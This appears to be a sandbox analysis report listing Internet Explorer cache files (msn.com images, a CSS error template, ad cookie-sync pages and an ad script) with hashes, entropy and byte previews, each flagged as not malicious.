                                                                                                                                                                                                  Preview: ......JFIF.....,.,.....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......K.d.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..niT..I.P..8.?..i...R.n.c.oh....6.|.~U=.rfL...f....E...7..zk.q.$m..Mb^x.L.-#...7L.._.X...,.......i. .y.8>....b..-....Y...S.j.^&.Y!~.vA.z(..d|....v}.N...U.Eo.G.=.k..B...{.;h.,.1.u..........i.nD.A.K0...<.5e".'Ju.......!..EA;...R3.q..'*..Ir.u.~*.."...r..H#.j.c-.g..`.M.%r.9 .O./i...,...*..9.../*...U.>T......[......U...Gm..Jz*.x.j.zXrE.@.S]@.+b.G.....D...4%.G.
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\BB1cZ1Ru[1].jpg
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 622x368, frames 3
                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                  Size (bytes):16111
                                                                                                                                                                                                  Entropy (8bit):7.87456843900809
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:7boVBF0735SKVkYskeZV8vsvujjzgjKF54gNW5wfaKm9:7bz7p2Yfe40FwSr
                                                                                                                                                                                                  MD5:67767883B13CED42ACB96ECCF4D77929
                                                                                                                                                                                                  SHA1:1E17A7AC9688EB08C72847C2403EE7813431F94C
                                                                                                                                                                                                  SHA-256:A7B0500926E7983E3FCA6D7767F463DCE0B0EFEC4433C4C1AB1C263F8CAA7480
                                                                                                                                                                                                  SHA-512:91308CC28D40AFAFD8FBADDC0C50F80FE0750FA0F8682928D24C9BD549DE1ACD117E0D5AE22A066131B21402AC4628F89D9FA0D0AA84F6D1E08256F7C92B3B07
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cZ1Ru.img?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=jpg&x=462&y=461
                                                                                                                                                                                                  Preview: ......JFIF.....,.,.....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......p.n.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..<.E..L....s.8.h?5.<...,[ s..g#....._......4..w...........>....Z.q&w.v......J.O.n.FbQNX......$~..RD.e.....<.u=.....Q.E.N.8.c.l.oJ{E......N"S...t.q.... ....?..7...7.s..x....U...U.;T.=G.....0r72)..B`u.."ZM.Y.._.Ca.U.......<.HD\....._ATC."m........>\.w'.@...G..T,jXq.g...q..$...>.......j...P.8+........[...>r.s....P4A4^]..0.Px.1....Z......?.z..*....*....}9..
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\BB1cZ1Ru[2].jpg
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 311x333, frames 3
                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                  Size (bytes):9893
                                                                                                                                                                                                  Entropy (8bit):7.897426230261628
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:BYf9PrMXftBkzaukfJ0zC+0+YtE/tBoX+kB2gri8DjRQRFOuIzLQd4Hiho0CPr:e1PrMXfTkzGS/dX/nCZjRgOuqhCTCPr
                                                                                                                                                                                                  MD5:A31BA13C6A8F67BCBAA13F56571911C8
                                                                                                                                                                                                  SHA1:91FEB9E2D35383EF2C0A267C1F662EEAE3773265
                                                                                                                                                                                                  SHA-256:FFD6D518BC02D63E7D816F4CE3C309CA864DAC03A1CDB584471EDD94F22A9420
                                                                                                                                                                                                  SHA-512:F6E10834D0A88AE7A6376D4A558877F4AB636462DFA920051443F133122FAFC70B00086930525A5F6BA05C12EE8085E3609A1E5A64BD1B1D08934882BD2CEF4B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cZ1Ru.img?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jpg&x=462&y=461
                                                                                                                                                                                                  Preview: ......JFIF.....,.,.....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..^.86.)..#..ap.2...c s.......~...6.s y....xZ...2Ll}.8..Ac,a...G.!.Df#..J..[............!..I......c. ...>.E4...u...a\..I..<.<[.e..=1........M1..[q.Y......Jt.v]...q.4......*...)1..FF9.V..#P....4.0.h.....4.)....&i?....;....iE..)..m9p).z...x..T.X~...2....Q. b.Z.k..)......^M..qN.3....@....hC.4......\.s.Q.....$.....N....8..".S.4....h.il.P..)..@.........W,..
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\BB1cZw6c[1].jpg
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 300x250, frames 3
                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                  Size (bytes):11578
                                                                                                                                                                                                  Entropy (8bit):7.939145426153418
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:Bb54XMHggdDemqJ50u6F//kYjM5puH5Mukh11STNSGnnl+I8v4/N32WCQWeb:Z5W6HIH0u6F/RXH55811STNSGnsB4Hbb
                                                                                                                                                                                                  MD5:4919D766A74862D3E95616007E49B3A1
                                                                                                                                                                                                  SHA1:3F7CA98BF7967ACE0E131564C0EDBD151E231971
                                                                                                                                                                                                  SHA-256:B92AB930FDF33D6CAEC4084A164A76BE7799DCABB813EC977F3A2E061C58CECD
                                                                                                                                                                                                  SHA-512:34A23BAEF27F76C7FDA5C53467F40D588ECFF8DFD7A97DC142CA7ACCB60708186A14EE6CAE9244EC6A4662EA761EF1CAF979E58158DB24EB65CE3639B34A0C1E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cZw6c.img?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=jpg
                                                                                                                                                                                                  Preview: ......JFIF.....,.,.....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO........,.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.......R.\.....h.+.vii...aXvj+..8..sI4.$....A.Bw7... ..KQ.;.}8.E.....[.'9..1c..D.....j\...8n.....(..p.@.{.&.:'....8.....gF.;..X..6....1.U{.s..(*$..QQ.vB.../N.......}j.R*..."KCe...jX.e<...v(.4].`...*L.d....A......s...q..?.g*fn.n..RV&v.4RQ@X\.f.Jc..Rf.,..)(.a.i.....f..Jv.AE.....Q@....P....@:.JZB..L.@X.zs(.Uj.x>p}..t.b......I.p[ .P.Ua...<.......hr.;3.U.....
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\BBIbVOm[1].png
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                  Size (bytes):795
                                                                                                                                                                                                  Entropy (8bit):7.615715234096511
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:6v/78/W/6TUdZVAZD/rc+c/AGljTpHqd2zBMrsLlZBYVWyMrnqEO03AGjfjjt7:U/6oYt/RcVl3pH822cRyMrnG03dx7
                                                                                                                                                                                                  MD5:0B075168CF2D19C936A0BF1A34ADE0F0
                                                                                                                                                                                                  SHA1:429B62EEB83C1B128700DC025F68599425BC5552
                                                                                                                                                                                                  SHA-256:39CA855FDCA2C76CDFA82B17AE0331D2B24D84029E16F8347DACBE2E02818138
                                                                                                                                                                                                  SHA-512:4AC96302CCC33EABF482360B6D2EB2B26FDD7959574036A75B324344A5901F1888DABA0F1893CB2DE8F0276F0FCBC25CE832171497DCDC29018BBD07684395C3
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBIbVOm.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                                                                                                                                                                                                  Preview: .PNG........IHDR................a....sRGB.........gAMA......a.....pHYs.................IDAT8OuS.KTQ......8.`..FV&a.BG*P..\.n..Ei_..iBD...h.(.hQZ-Z..q!.}....-"...4.r..x...w....s....... T~.'..).kd..D.$go....S.C...+..h.H..[.f.C.#..lp..&Cih..}...e.....@@.....'.^f(p.gZ.#..HOJ.+qH...tV%....`..xZ.Q....pe[5E.2.C$R... .0.N..../.u...2.?W.....H&.D%kQ...`Q...G...i...!.%..W.........2.I..o..h?..L..W.s.*..hBi[#....\....|..(i.S.p..1z.....SD..B.m..<&.....-......z+.6.-V5...7m...&V.|....)...s:._..,m..}....e......T.=y..<..4Ms...$..u..I....~....].r.@j9...W07<.(.c.G...Z....o#...,.B.h..-.....{130.h....._R@+A;I0..k;8.6|...Om.!Y.6........\\..{:Y.zF.R....wg..z......pF..sZ$.H.._...u.mT.......:V3.....;@...&..Y..+..NNw.D..a..B..W."..=.).....4....=....T.(.J......e..w....IEND.B`.
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\BBZ3zrM[1].png
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                  Size (bytes):762
                                                                                                                                                                                                  Entropy (8bit):7.614206271808948
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:6v/78/W/6Tr7wRY1xnBIIpFHsY6ppwWyqx40riXsto+JLNLX8TW9SxOaJrJEQIYR:U/6AIOQFHsY6pGqBiXsttxsTLxOaJrJ9
                                                                                                                                                                                                  MD5:4948BCF4790FCC1A155C882BB00882E1
                                                                                                                                                                                                  SHA1:B99BA11A86E5D0798DF7EBA4EB3490DC8AAA8523
                                                                                                                                                                                                  SHA-256:6A989B924D2197375361EEA4F4BD018D02F664AE3A2B11F4255E486A5F8691B7
                                                                                                                                                                                                  SHA-512:ED70FACA673FD63076CC53DF9E9AE28E0A7FBF7DE177F5E1DA266220BBA136BA4F657DDBD3EEA3D20B5B7F938D389F62885E96BB03CFCB53C2D49B30536EA675
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBZ3zrM.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                                                                                                                                                                                                  Preview: .PNG........IHDR................a....sRGB.........gAMA......a.....pHYs.................IDAT8OeSOO.Q.....Bi......&.h.!.h....x......$.M.|.o...9z.^.d...Q...."...t.m...8.-........}o..q..@...O'.^9|.).7]5H...'+M5.!......M^@.....?]..m::..V.C.1.8..@..........t..1.fD.3}..y.w..#b(.:....~....$M...&...HGM....$.,?.X.X~.7..`.3.S...8......"Y.*..v.?....*.~5C.......d.CY;..!jh..aat~.k.'......r.).Dtp..9.s.:.../..~..x2....l...g.rB'R..L.^-...t.p.p..S.U..r.>.[.E.GJ...t.|..J.*.:m......p2G.z...r.~.K.a`0.@.".F..]L.._\N.7....?..Lo:..j|t......F.ke.#..x..."...B.#./.n(..9%..<|/.....o...<n..;y.j.J6..G....`.3[c.....Q.G3.`86.>\..%.,.\.L-...p=...c..r.%.|..... ..1f....w....$..2j..@x.....5.-.\};!s..C....5..'V6....&~[...I...j.]K....:....2.....IEND.B`.
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\NewErrorPageTemplate[1]
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                  Size (bytes):1612
                                                                                                                                                                                                  Entropy (8bit):4.869554560514657
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:5Y0bQ573pHpACtUZtJD0lFBopZleqw87xTe4D8FaFJ/Doz9AtjJgbCzg:5m73jcJqQep89TEw7Uxkk
                                                                                                                                                                                                  MD5:DFEABDE84792228093A5A270352395B6
                                                                                                                                                                                                  SHA1:E41258C9576721025926326F76063C2305586F76
                                                                                                                                                                                                  SHA-256:77B138AB5D0A90FF04648C26ADDD5E414CC178165E3B54A4CB3739DA0F58E075
                                                                                                                                                                                                  SHA-512:E256F603E67335151BB709294749794E2E3085F4063C623461A0B3DECBCCA8E620807B707EC9BCBE36DCD7D639C55753DA0495BE85B4AE5FB6BFC52AB4B284FD
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  IE Cache URL:res://ieframe.dll/NewErrorPageTemplate.css
                                                                                                                                                                                                  Preview: .body..{.. background-repeat: repeat-x;.. background-color: white;.. font-family: "Segoe UI", "verdana", "arial";.. margin: 0em;.. color: #1f1f1f;..}.....mainContent..{.. margin-top:80px;.. width: 700px;.. margin-left: 120px;.. margin-right: 120px;..}.....title..{.. color: #54b0f7;.. font-size: 36px;.. font-weight: 300;.. line-height: 40px;.. margin-bottom: 24px;.. font-family: "Segoe UI", "verdana";.. position: relative;..}.....errorExplanation..{.. color: #000000;.. font-size: 12pt;.. font-family: "Segoe UI", "verdana", "arial";.. text-decoration: none;..}.....taskSection..{.. margin-top: 20px;.. margin-bottom: 28px;.. position: relative; ..}.....tasks..{.. color: #000000;.. font-family: "Segoe UI", "verdana";.. font-weight:200;.. font-size: 12pt;..}....li..{.. margin-top: 8px;..}.....diagnoseButton..{.. outline: none;.. font-size: 9pt;..}.....launchInternetOptionsButton..{.. outline: none;
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\a5ea21[1].ico
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:PNG image data, 32 x 32, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                  Size (bytes):758
                                                                                                                                                                                                  Entropy (8bit):7.432323547387593
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:6v/792/6TCfasyRmQ/iyzH48qyNkWCj7ev50C5qABOTo+CGB++yg43qX4b9uTmMI:F/6easyD/iCHLSWWqyCoTTdTc+yhaX4v
                                                                                                                                                                                                  MD5:84CC977D0EB148166481B01D8418E375
                                                                                                                                                                                                  SHA1:00E2461BCD67D7BA511DB230415000AEFBD30D2D
                                                                                                                                                                                                  SHA-256:BBF8DA37D92138CC08FFEEC8E3379C334988D5AE99F4415579999BFBBB57A66C
                                                                                                                                                                                                  SHA-512:F47A507077F9173FB07EC200C2677BA5F783D645BE100F12EFE71F701A74272A98E853C4FAB63740D685853935D545730992D0004C9D2FE8E1965445CAB509C3
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  IE Cache URL:https://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
                                                                                                                                                                                                  Preview: .PNG........IHDR... ... ............pHYs.................vpAg... ... ........eIDATH...o.@../..MT..KY..P!9^....:UjS..T."P.(R.PZ.KQZ.S. ....,v2.^.....9/t....K..;_ }'.....~..qK..i.;.B..2.`.C...B........<...CB.....).....;..Bx..2.}.. ._>w!..%B..{.d...LCgz..j/.7D.*.M.*.............'.HK..j%.!DOf7......C.]._Z.f+..1.I+.;.Mf....L:Vhg..[.. ..O:..1.a....F..S.D...8<n.V.7M.....cY@.......4.D..kn%.e.A.@lA.,>\.Q|.N.P........<.!....ip...y..U....J...9...R..mgp}vvn.f4$..X.E.1.T...?.....'.wz..U...../[...z..(DB.B(....-........B.=m.3......X...p...Y........w..<.........8...3.;.0....(..I...A..6f.g.xF..7h.Gmq|....gz_Z...x..0F'..........x..=Y}.,jT..R......72w/...Bh..5..C...2.06`........8@A..."zTXtSoftware..x.sL.OJU..MLO.JML.../.....M....IEND.B`.
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\a8a064[1].gif
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:GIF image data, version 89a, 28 x 28
                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                  Size (bytes):16360
                                                                                                                                                                                                  Entropy (8bit):7.019403238999426
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:g2SEiHys4AeP/6ygbkUZp72i+ccys4AeP/6ygbkUZaoGBm:g2Tjs4Ae36kOpqi+c/s4Ae36kOaoGm
                                                                                                                                                                                                  MD5:3CC1C4952C8DC47B76BE62DC076CE3EB
                                                                                                                                                                                                  SHA1:65F5CE29BBC6E0C07C6FEC9B96884E38A14A5979
                                                                                                                                                                                                  SHA-256:10E48837F429E208A5714D7290A44CD704DD08BF4690F1ABA93C318A30C802D9
                                                                                                                                                                                                  SHA-512:5CC1E6F9DACA9CEAB56BD2ECEEB7A523272A664FE8EE4BB0ADA5AF983BA98DBA8ECF3848390DF65DA929A954AC211FF87CE4DBFDC11F5DF0C6E3FEA8A5740EF7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  IE Cache URL:https://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
                                                                                                                                                                                                  Preview: GIF89a.......dbd...........lnl.........trt..................!..NETSCAPE2.0.....!.......,..........+..I..8...`(.di.h..l.p,..(.........5H.....!.......,.........dbd...........lnl......dfd....................../..I..8...`(.di.h..l..e.....Q... ..-.3...r...!.......,.........dbd..............tvt...........................*P.I..8...`(.di.h.v.....A<.. ......pH,.A..!.......,.........dbd........|~|......trt...ljl.........dfd......................................................B`%.di.h..l.p,.t]S......^..hD..F. .L..tJ.Z..l.080y..ag+...b.H...!.......,.........dbd.............ljl.............dfd........lnl..............................................B.$.di.h..l.p.'J#............9..Eq.l:..tJ......E.B...#.....N...!.......,.........dbd...........tvt.....ljl.......dfd.........|~|.............................................D.$.di.h..l.NC.....C...0..)Q..t...L:..tJ.....T..%...@.UH...z.n.....!.......,.........dbd..............lnl.........ljl......dfd...........trt...
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\checksync[1].htm
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):20647
                                                                                                                                                                                                  Entropy (8bit):5.29809706323854
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:P9AGm6ElzD7XzeMk/lg2f5vzBgF3OZOoQWwY4RXrqt:REJDnci2RmF3OsoQWwY4RXrqt
                                                                                                                                                                                                  MD5:F469156B30F21DBBE8753F150558C99B
                                                                                                                                                                                                  SHA1:399066F1A989B29D1089995284F0F137E2AFFD7B
                                                                                                                                                                                                  SHA-256:9236F0A1E3955530ACDA603B7D05323A1F6FC90C97845C435F64F0903D681D4B
                                                                                                                                                                                                  SHA-512:97387740076877139B7D4E9CF163F38012712968259F2E20ABD7190B1F1883F99DCDBBC402FCF9AB46C49655EDBBB0FBFAA52097F57774A2A2D6BB077698FDA1
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview: <html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":73,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0}},"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"log":{"successLper":10,"failLper":10,"logUrl":{"cl":"https:\/\/hblg.media.net\/log?logid=kfk&evtid=chlog"}},"csloggerUrl":"https:\/\/cslogger.
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\checksync[2].htm
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):20647
                                                                                                                                                                                                  Entropy (8bit):5.29809706323854
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:P9AGm6ElzD7XzeMk/lg2f5vzBgF3OZOoQWwY4RXrqt:REJDnci2RmF3OsoQWwY4RXrqt
                                                                                                                                                                                                  MD5:F469156B30F21DBBE8753F150558C99B
                                                                                                                                                                                                  SHA1:399066F1A989B29D1089995284F0F137E2AFFD7B
                                                                                                                                                                                                  SHA-256:9236F0A1E3955530ACDA603B7D05323A1F6FC90C97845C435F64F0903D681D4B
                                                                                                                                                                                                  SHA-512:97387740076877139B7D4E9CF163F38012712968259F2E20ABD7190B1F1883F99DCDBBC402FCF9AB46C49655EDBBB0FBFAA52097F57774A2A2D6BB077698FDA1
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview: <html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":73,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0}},"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"log":{"successLper":10,"failLper":10,"logUrl":{"cl":"https:\/\/hblg.media.net\/log?logid=kfk&evtid=chlog"}},"csloggerUrl":"https:\/\/cslogger.
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\e151e5[1].gif
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                  Size (bytes):43
                                                                                                                                                                                                  Entropy (8bit):3.122191481864228
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:CUTxls/1h/:7lU/
                                                                                                                                                                                                  MD5:F8614595FBA50D96389708A4135776E4
                                                                                                                                                                                                  SHA1:D456164972B508172CEE9D1CC06D1EA35CA15C21
                                                                                                                                                                                                  SHA-256:7122DE322879A654121EA250AEAC94BD9993F914909F786C98988ADBD0A25D5D
                                                                                                                                                                                                  SHA-512:299A7712B27C726C681E42A8246F8116205133DBE15D549F8419049DF3FCFDAB143E9A29212A2615F73E31A1EF34D1F6CE0EC093ECEAD037083FA40A075819D2
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  IE Cache URL:https://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
                                                                                                                                                                                                  Preview: GIF89a.............!.......,...........D..;
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\fcmain[1].js
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                  Size (bytes):37220
                                                                                                                                                                                                  Entropy (8bit):5.09318260702732
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:t1avn4u3hPPXW94hMedhD+YXf9wOBEZn3SQN3GFl295oMlkPRrBklkP/sK:XQn4uRnWmhMeHD+YXf9wOBEZn3SQN3Gp
                                                                                                                                                                                                  MD5:B724B7AC0D54EBC0F0E10DE8478B5A1B
                                                                                                                                                                                                  SHA1:B7C0317B5FBA61480A363392850AD86420B71B01
                                                                                                                                                                                                  SHA-256:0BFE4CE50772DE6597DF8E461FF52E54B1174EA0F3BBE1A4BC1E396636D6711C
                                                                                                                                                                                                  SHA-512:D461E122CCB89829BF5F69F9EC4F3C815D22B7E1F13B2515238805D41AB12CDD0A17DFA1E7BDB5CB805EFFFB0D2B7030BF69BF79A9BF2921A891B11210C13B8D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  IE Cache URL:https://contextual.media.net/803288796/fcmain.js?&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3D%3D&crid=722878611&size=306x271&cc=CH&https=1&vif=2&requrl=https%3A%2F%2Fwww.msn.com%2Fde-ch%2F%3Focid%3Diehp&nse=5&vi=1611306999475854672&ugd=4&rtbs=1&nb=1&cb=window._mNDetails.initAd
                                                                                                                                                                                                  Preview: ;window._mNDetails.initAd({"vi":"1611306999475854672","s":{"_mNL2":{"size":"306x271","viComp":"1611306594931531630","hideAdUnitABP":true,"abpl":"3","custHt":"","setL3100":"1"},"lhp":{"l2wsip":"2886940244","l2ac":""},"_mNe":{"pid":"8PO641UYD","requrl":"https://www.msn.com/de-ch/?ocid=iehp#mnetcrid=722878611#"},"_md":[],"ac":{"content":"<!DOCTYPE HTML PUBLIC \"-\/\/W3C\/\/DTD HTML 4.01 Transitional\/\/EN\" \"http:\/\/www.w3.org\/TR\/html4\/loose.dtd\">\r\n<html xmlns=\"http:\/\/www.w3.org\/1999\/xhtml\">\r\n<head><meta http-equiv=\"x-dns-prefetch-control\" content=\"on\"><style type=\"text\/css\">body{background-color: transparent;}<\/style><meta name=\"tids\" content=\"a='800072941' b='803767816' c='msn.com' d='entity type'\" \/><script type=\"text\/javascript\">try{window.locHash = (parent._mNDetails && parent._mNDetails.getLocHash && parent._mNDetails.getLocHash(\"722878611\",\"1611306999475854672\")) || (parent._mNDetails[\"locHash\"] && parent._mNDetails[\"locHash\
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\http___cdn.taboola.com_libtrc_static_thumbnails_2b016d601242a511f3242b0d41867296[1].jpg
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
                                                                                                                                                                                                  Category:downloaded
